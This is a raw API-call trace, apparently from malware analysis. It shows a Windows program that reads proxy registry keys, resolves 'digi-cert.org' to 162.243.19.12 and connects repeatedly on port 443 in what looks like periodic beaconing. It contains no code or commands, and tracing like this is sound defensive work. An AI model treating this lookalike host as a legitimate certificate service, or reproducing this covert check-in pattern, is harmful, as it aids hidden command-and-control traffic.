Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = digi-cert.org, address_out = 162.243.19.12	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
Socket	Connect	remote_address = 162.243.19.12, remote_port = 443	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 333, size_out = 333	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 49, size_out = 49	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1, size_out = 1	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 48, size_out = 48	1	Fn Data
System	Open Certificate Store	encoding_type = 65537, flags = 8708	1	Fn
Socket	Send	flags = NO_FLAG_SET, size_out = 272	1	Fn
Socket	Receive	flags = NO_FLAG_SET, size = 5, size_out = 5	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 1488, size_out = 1488	1	Fn Data
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
